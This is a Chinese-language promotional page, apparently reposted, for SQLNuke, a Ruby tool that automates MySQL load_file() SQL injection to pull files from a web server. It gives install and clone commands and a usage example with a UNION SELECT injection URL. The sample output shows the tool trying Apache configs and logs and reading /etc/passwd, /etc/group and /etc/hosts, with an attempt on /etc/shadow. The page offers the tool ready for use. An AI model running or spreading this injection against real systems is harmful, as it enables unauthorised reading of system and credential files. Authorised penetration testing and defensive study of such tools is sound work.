SQLNuke:MYSQL load_file()函数注入工具
SQLNuke是一个功能强大而又简单的MYSQL load_file()函数注入工具。
在Mysql进行SQL注入攻击中,当你需要收集一些服务器的信息,你能想到的最好的方式是从load_file()函数下手,而手工推测的方法会耗费大量的时间,现在SQLNuke可以帮助你使这个过程轻松愉快。
依赖:
git
$ sudo apt-get install git-core $ which git _/usr/bin/git_ $ git --version _git version 1.7.0.4_
ruby (Ubuntu)
$ sudo apt-get install ruby
SQLNuke Installation
$ git clone https://github.com/nuke99/sqlnuke.git $ cd sqlnuke $ ./sql.rb
基本用法
root@hakb0x:/sqlnuke# ./sql.rb -u 'http://localhost/index.php?id=-1+UNION+SELECT+1,XxxX,3--' [!] localhost folder already exists [!] No OS selected, Continue with all the possibilities [200] - [Failed] /etc/apache2/logs/access.log [200] - [Success] /etc/hosts [200] - [Failed] /home/apache/httpd.conf [200] - [Failed] /usr/local/apache2/conf/httpd.conf [200] - [Failed] /etc/apache2/vhosts.d/default_vhost.include [200] - [Failed] /etc/apache2/apache2.conf [200] - [Failed] /opt/apache/conf/httpd.conf [200] - [Failed] /usr/local/apache/conf/httpd.conf [200] - [Failed] /var/www/vhosts/sitename/httpdocs//etc/init.d/apache [200] - [Success] /etc/passwd [200] - [Failed] /etc/apache/apache.conf [200] - [Failed] /etc/httpd/conf/httpd.conf [200] - [Failed] /home/apache/conf/httpd.conf [200] - [Failed] /etc/apache2/sites-available/default [200] - [Failed] /etc/apache/httpd.conf [200] - [Failed] /etc/httpd/access.log [200] - [Failed] /etc/apache2/httpd.conf [200] - [Failed] /etc/httpd/httpd.conf [200] - [Failed] /etc/init.d/apache2/httpd.conf [200] - [Failed] /etc/init.d/apache/httpd.conf [200] - [Success] /etc/group [200] - [Failed] C:/wamp/bin/apache/logs/access.log [200] - [Failed] /etc/shadow .... [+] Saved files are in 'output/localhost' 下载地址